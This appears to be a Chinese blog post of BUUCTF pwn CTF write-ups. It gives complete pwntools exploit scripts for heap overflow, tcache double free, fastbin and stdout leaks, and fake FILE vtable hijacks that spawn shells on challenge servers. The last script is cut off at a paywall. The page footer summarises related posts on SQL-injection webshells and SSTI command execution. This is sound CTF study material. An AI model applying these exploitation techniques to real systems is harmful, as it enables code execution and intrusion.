BUUCTF pwn 四月刷题

最新推荐文章于 2025-09-20 23:34:35 发布
原创 最新推荐文章于 2025-09-20 23:34:35 发布 · 965 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

BUUCTF四月刷题

[OGeek2019]bookmanager

这道题程序看似比较复杂,实际上好好分析程序的结构和逻辑之后,还是一个堆溢出,在updata函数中更新text时候可以更新0xFF长度的内容,造成溢出。这类题比较重要的是一定要弄清楚程序中的各种结构再下手。
libc泄漏的手段还是通过small bin free进unsorted bin之后打印出main_arena附近的地址;get shell是通过堆溢出修改FD指针打malloc hook,惊喜的是,居然不用realloc来调节栈地址了,直接用one gadget就打通了。

from pwn import *

#context.log_level = "debug"
context.terminal = ["/usr/bin/tmux", "splitw", "-h", "-p", "70"]

#io = process("./pwn")
io = remote("node3.buuoj.cn", 25457)
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")

def debug(command=None):
	if command:
		gdb.attach(io, command)
	else:
		gdb.attach(io)

def add_chapter(chapter):
	io.recvuntil("choice:")
	io.sendline("1")
	io.recvuntil("name:")
	io.send(chapter)

def add_section(chapter, section):
	io.recvuntil("choice:")
	io.sendline("2")
	io.recvuntil("into:")
	io.sendline(chapter)
	io.recvuntil("0x")
	section_ptr =  int(io.recvuntil("\n")[:-1], 16)
	io.recvuntil("name:")
	io.send(section)
	return section_ptr

def add_text(section, size, text):
	io.recvuntil("choice:")
	io.sendline("3")
	io.recvuntil("into:")
	io.sendline(section)
	io.recvuntil("write:")
	io.sendline(str(size))
	io.recvuntil("Text:")
	io.send(text)

def remove_chapter(chapter):
	io.recvuntil("choice:")
	io.sendline("4")
	io.recvuntil("name:")
	io.sendline(chapter)

def remove_section(section):
	io.recvuntil("choice:")
	io.sendline("5")
	io.recvuntil("name:")
	io.sendline(section)

def remove_text(text):
	io.recvuntil("choice:")
	io.sendline("6")
	io.recvuntil("name:")
	io.sendline(text)

def preview():
	io.recvuntil("choice:")
	io.sendline("7")

def update_text(section, text):
	io.recvuntil("choice:")
	io.sendline("8")
	io.recvuntil("Text):")
	io.sendline("Text")
	io.recvuntil("name:")
	io.sendline(section)
	io.recvuntil("New Text:")
	io.send(text)


io.recvuntil("create: ")
io.sendline("start")

add_chapter("c0")
add_section("c0", "s0")
add_text("s0", 0x90, "aaa")
add_section("c0", "s1")
add_section("c0", "s2")
add_section("c0", "s3")
add_section("c0", "s4")

remove_text("s0")
add_text("s0", 0x90, "a"*0x8)

preview()
io.recvuntil("Text:aaaaaaaa")
main_arena = u64(io.recv(6).ljust(8, "\x00")) - 88
libc_addr = main_arena - 0x3c4b20
print "main arena: " + hex(main_arena)
print "libc addr: " + hex(libc_addr)

# edit fd to attack malloc hook
add_text("s1", 0x60, "aa")
add_text("s2", 0x60, "aa")

remove_text("s2")

fake_fd = main_arena - 0x33
payload = "\x00"*0x60
payload += p64(0x0)
payload += p64(0x71)
payload += p64(fake_fd)
update_text("s1", payload)

add_text("s3", 0x60, "aa")

one_gadget = libc_addr + 0x4526a
realloc_addr = libc_addr + libc.symbols["__libc_realloc"]

add_text("s4", 0x60, "a")

payload = "a"*0xb
payload += p64(one_gadget)
payload += p64(realloc_addr)
update_text("s4", payload)

#debug("b *$rebase(0xF5F)")

io.recvuntil("choice:")
io.sendline("1")

io.interactive()

pwnable_seethefile

第一次做IO FILE的题目,记录一下。程序在exit功能处有一个bss段上的溢出,可以覆盖file指针,于是思路就是将file指针指向伪造的FILE struct结构体,并同时将vtable指针指向有是system的区域。

有几个注意点:

  1. 泄漏libc的方法是通过读取这个文件/proc/self/maps,找到libc地址
  2. 32bit下_IO_FILE结构体的大小是0x94,也就是vtable的偏移是0x94
  3. 构造FILE结构体只需要关注两个变量,第一个为FILE结构体的_flags字段,只需要_flags & 0x2000为0就会直接调用_IO_FINSH(fp),_IO_FINISH(fp)相当于调用fp->vtabl->__finish(fp)。将fp指向一块内存P,P偏移0的前4字节设置为0xffffdfff,P偏移4位置放上要执行的字符串指令(字符串以’;'开头即可),P偏移sizeof(_IO_FILE)大小位置(vtable)覆盖为内存区域Q,Q偏移2*4字节处(vtable->__finish)覆盖为system函数地址即可。其中要注意的是_flags位送入的时候要符合小段法的原则,送入“\xff\xdf\xff\xff”,而不是"\xff\xff\xdf\ff",这样才能直接调用_IO_FINISH(fp)
  4. BUUCTF没有给libc文件,应该是漏了,pwnable.tw有对应的libc文件
from pwn import *

#context.log_level = "debug"
context.terminal = ["/usr/bin/tmux", "splitw", "-h", "-p", "70"]

#io = process("./pwn")
io = remote("node3.buuoj.cn", 26869)
#io = remote("chall.pwnable.tw", 10200)
libc = ELF("./libc_32.so.6")

def debug(command=None):
	if command:
		gdb.attach(io, command)
	else:
		gdb.attach(io)

def open(file_name):
	io.recvuntil("choice :")
	io.sendline("1")
	io.recvuntil("see :")
	io.sendline(file_name)

def read():
	io.recvuntil("choice :")
	io.sendline("2")

def write():
	io.recvuntil("choice :")
	io.sendline("3")

def close():
	io.recvuntil("choice :")
	io.sendline("4")

def exit(name):
	io.recvuntil("choice :")
	io.sendline("5")
	io.recvuntil("name :")
	io.sendline(name)

open("/proc/self/maps")
read()
write()

io.recvline()
io.recvline()
io.recvline()
io.recvline()
libc_addr = int(io.recv(8), 16) + 0x1000
print "libc addr: " + hex(libc_addr)
close()

system_addr = libc_addr + libc.symbols["system"]


open("/proc/self/maps")
fake_file_addr = 0x0804B300

payload = "a"*0x20
payload += p32(fake_file_addr)	#addr:0x0804B280
payload += "\x00"*0x7c
payload += "\xff\xdf\xff\xff;sh".ljust(0x94, "\x00")   #addr:0x0804B300 fake file struct
payload += p32(fake_file_addr+0x94+4)	##addr:0x0804B394 vtable
payload += p32(0x0) * 2
payload += p32(system_addr)

exit(payload)


io.interactive()

ciscn_2019_en_3

读取ID的时候,由于用的read函数,没有\x00的截断,所以在下面puts的时候就可以泄漏出栈上的地址,进而得到libc基址。然后就是tcache double free,打__free_hook,最后执行system("/bin/sh")

from pwn import *

#context.log_level = "debug"
context.terminal = ["/usr/bin/tmux", "splitw", "-h", "-p", "70"]

#io = process("./pwn")
io = remote("node3.buuoj.cn", 25940)
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")

def debug():
	gdb.attach(io)

def add(size, content):
	io.recvuntil("choice:")
	io.sendline("1")
	io.recvuntil("story: \n")
	io.sendline(str(size))
	io.recvuntil("story: ")
	io.send(content)

def delete(index):
	io.recvuntil("choice:")
	io.sendline("4")
	io.recvuntil("index:\n")
	io.sendline(str(index))


io.recvuntil("name?\n")
io.sendline("coco")
io.recvuntil("ID.\n")
io.send("a"*8)

io.recvuntil("a"*8)
libc_addr = u64(io.recv(6).ljust(8, "\x00")) - 0x81237
print "libc addr: " + hex(libc_addr)

add(0x30, "a")
add(0x20, "/bin/sh\x00")
delete(0)
delete(0)

add(0x30, p64(libc_addr + libc.symbols["__free_hook"]))
add(0x30, "a")
add(0x30, p64(libc_addr + libc.symbols["system"]))

delete(1)

#debug()

io.interactive()

de1ctf_2019_weapon

这道题没有puts函数,所以这里用stdout来泄漏libc。将一个0x70的chunk同时放入fastbin和unsorted bin中,这样就可以在fastbin的fd指针踩出libc中的地址,然后修改后几位(有一位需要爆破),让fd指针指向_IO_2_1_stdout_结构体所在的fake chunk,修改_flag和write base,使得打印出libc中的地址。最后打malloc hook来get shell。
注意点:

  1. 修改了stdout之后,再调用puts不会输出\n了,要相应的做修改
  2. 需要爆破的题目都可以使用IPython的embed功能进行调试
#coding=utf-8
from pwn import *
from IPython import embed as ipy

#context.log_level = "debug"
context.terminal = ["/usr/bin/tmux", "splitw", "-h", "-p", "70"]

io = process("./pwn")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")

def debug(command=None):
	if not command:
		gdb.attach(io)
	else:
		gdb.attach(io, command)
def create(size, index, content, flag=0):
	if flag:
		io.recvuntil("choice >> ")
	else:
		io.recvuntil("choice >> \n")
	io.sendline("1")
	io.recvuntil("weapon: ")
	io.sendline(str(size))
	io.recvuntil("index: ")
	io.sendline(str(index))
	if flag:
		io.recvuntil("name:")
	else:
		io.recvuntil("name:\n")
	io.send(content)

def delete(index, flag=0):
	if flag:
		io.recvuntil("choice >> ")
	else:
		io.recvuntil("choice >> \n")
	io.sendline("2")
	io.recvuntil("idx :")
	io.sendline(str(index))

def rename(index, content, flag=0):
	if flag:
		io.recvuntil("choice >> ")
	else:
		io.recvuntil("choice >> \n")
	io.sendline("3")
	io.recvuntil("idx: ")
	io.sendline(str(index))
	if flag:
		io.recvuntil("content:")
	else:
		io.recvuntil("content:\n")
	io.send(content)

def exp():

	payload = p64(0) + p64(0x21)
	create(0x10, 0, payload) 	#0
	create(0x60, 1, "a")		#1
	create(0x10, 2, "a")		#2
	create(0x10, 3, "a")		#3

	delete(3)
	delete(2)

	rename(2, p8(0x10))

	create(0x10, 4, "a")

	delete(1)
	payload = p64(0x0) + p64(0x91)
	create(0x10, 5, payload)
	delete(1)

	fake_chunk = 0x75dd

	# debug("b *$rebase(0xC11)")
	# ipy()

	rename(1, p16(fake_chunk))
	rename
最低0.47元/天 解锁文章
coco##
关注
CTF-BeesCMS系统漏洞分析溯源
asd158923328的博客
08-21 4995
根据意 漏洞原因:因为BeesCMS后台登陆页面存在sql注入,可以被用来写入一句话木马或者查看管理员密码 进入环境,通过御剑工具扫描网站目录,发现/admin/login.php 首先在用户名 中 输入 ‘ 出现了报错, 确认后台登陆页面的user 有存在sql注入。 然后输入 ‘ or 1=1 # 就返回了正常的登陆失败的页面。 sql 回显可以看出有五个字段 所以尝试 ‘ unio...
BUUCTFpwnable_seethefile
xy1458214551的博客
12-28 493
BUUCTFpwnable_seethefile
2022祥云杯pwn
m0_63437215的博客
11-05 519
2022祥云杯pwn
【我的 PWN 学习手札】setcontext + shellcode
Mr_Fmnwon的博客
10-24 1070
之后释放一个 SigreturnFrame,寄存器设置如下图所示。程序通过 setcontext gadget 设置寄存器后将 完成栈迁移可程序执行流劫持后程序将执行,此时会调用 mprotect 函数将 free_hook 所在内存页添加 可执行属性并且会将栈迁移至 &free_hook+0x8 的位置。执行完 mprotect 函数后程序将跳转至 shellcode1 执行。shellcode 会向 __free_hook 所在内存页起始位置读入能 orw 的 shellcode2 并跳转 至 shel
BUUCTF_PWN
最新发布
m0_63999287的博客
09-20 356
该文章分析了一个存在栈溢出漏洞的64位程序。通过checksec和IDA静态分析发现程序存在无限制输入漏洞和后门函数fun。解思路是利用栈溢出覆盖返回地址为fun函数地址。通过IDA分析得出偏移量为0x17字节,构造包含fun函数地址的payload成功实现栈溢出攻击,最终获取flag。文章展示了从程序分析到漏洞利用的完整过程,包括静态分析、偏移计算和exp编写等关键步骤。
buuoj记录2
臭nana的博客
06-11 351
[GYCTF2020]Ezsqli 首先从目名字就能知道这是道SQL注入 打开目测一下,输入1打印Nu1L,输入2打印V&N,其他的数字是报没有查询结果的错 加个单引号试试,显示bool(false) 布尔盲注 import requests url = "http://0a02ac5a-9801-4b63-a153-6d331955650d.node3.buuoj.cn/index.php" database = "" key='' for i in range(1
BUUCTF pwn 五月
coco的博客
05-04 817
actf_2019_babystack 典型的stack pivot,告诉了输入时候栈的地址,我们可以通过伪造ebp,通过两次leave将esp指向开始时候的栈地址。注意的是这里system("/bin/sh")有问,换了one gadget才成功,不是很清楚为什么。 from pwn import * context.log_level = "debug" context.terminal ...
buuctf pwn(1)
清霂的博客
01-30 1345
目录1.test_your_nc2.pwn13.warmup_csaw_2016 1.test_your_nc 先用exeinfo查壳,是64位的程序 用64位ida静态分析一下,找到main函数 F5反汇编,看到system("/bin/sh") system()的作用———执行shell命令也就是向dos发送一条指令。 即执行/bin/sh命令,获得shell权限 用虚拟机连node3.buuoj.cn:27191 nc node3.buuoj.cn 27191 查看文件目录 ls 查看flag
BUUCTF-pwn记录(22-7-30更新)
Morphy_Amo的博客
03-04 4525
BUUCTF记录
BUUCTF-PWN记录-14
weixin_44145820的博客
04-29 939
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
heap_overflow(OGeek2019-bookmanger50)
csdn546229768的博客
03-25 497
目:OGeek2019-bookmanger50 保护 分析 add_chapter add_section add_text rm_chapter rm_section rm_text show edit 思路 这的漏洞非常多有uaf,off-by-one,堆溢出因为漏洞太多以至于给我整不会了,ida逆向时看起来挺复杂其实就是一个常规的简单堆,我在做unsort bin泄漏libc时把堆空间整坏了,做时我没注意到泄漏方式的问导致我后面做的怀疑人生,导致花了非常多时间,其实这
secretHolder_hitcon_2016(有关mmap的chunk如何分配到top chunk里与普通chunk相邻)
seaaseesa的博客
04-30 778
secretHolder_hitcon_2016 这和上一https://blog.youkuaiyun.com/seaaseesa/article/details/105856878功能相似,并且上一的利用手法这里同样可以利用,这里,有另一种手法,从而引出了一个新的知识点。 这,delete功能里增加了对huge chunk的free Huge chunk的大小为0x61A80,...
BUUCTF-PWN ciscn_2019_final_5(临界条件错误,劫持GOT表项)
weixin_44145820的博客
04-14 1168
目录目分析漏洞分析漏洞利用Exp 目分析 例行安全检查 没有PIE,方面调试 partial relro意味着这应该直接改GOT表就能做 菜单: 没有show功能,可以考虑吧某个函数(比如free的GOT)改为puts@plt 可以申请17个chunk,编号为0-16 每次分配结束后会显示分配内存的低12bits 而本中还有一个特殊的地方,就是content数组(0x6020e0)...
BUUCTF:[CSCCTF 2019 Qual]FlaskLight
末初 · mochu7
07-26 3123
目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight ?search={{7*7}} #通过回显判断SSTI ?search={{''.__class__.__mro__[2].__subclasses__()}} #爆出所有类 编写脚本查找可利用的类 利用subprocess.Popen执行命令 import requests import re import html import time index = 0 f
SCTF 2015 pwn分析
weixin_30819163的博客
05-11 231
Re1 是一个简单的字符串加密。程序使用了多个线程,然后进行同步。等加密线程加密好了之后才会启动验证线程。这个比较坑的是IDA F5出来的结果不对,不知道是不是混淆机制。 刚开始看的是F5后的伪代码,一脸懵逼。后来看了下汇编才明白是怎么回事。 解密直接打表就可以,也可以写逆算法。 pwn1 用checksec看了一下保护机制,有canary+nx保护。漏洞是一个简单的栈溢出,但是...
pwn学习-攻防世界(一)
qq_45653588的博客
12-20 948
文章目录0x00 forgot0X01 dice_game0x02 Mary_Morton0x03 warmup 0x00 forgot 下载文件,检查文件保护机制,只开启了NX保护的32位文件。 拖入ida反编译一下,好多函数。。 先输入一个参数s,然后给出了函数sub_8048654()的地址,然后输入参数v2的值,进入for循环。判断v0的值和v2的长度,v0大于等于v2退出循环。 接下来是switch语句,参数为v14,初始为1,退出switch后,会执行(*(&v3 + --v14))()
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 760
分析 这目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这有off
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
高校战“疫”网络安全分享赛pwn部分wp
starssgo的博客
03-11 952
高校战“疫”网络安全分享赛pwn部分wp 博客地址 easyheap 刚复现的第一,并且在刚开始的时候连洞都找不到…可真是当头一棒。 漏洞在申请的大小大于0x400时,return。这时ptr[i]没有被释放,接下来就是常规劫持ptr[i]堆块上的指针为got表。修改got表。来实现利用。 # -*- coding: utf-8 -* from pwn import *from LibcSea...
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值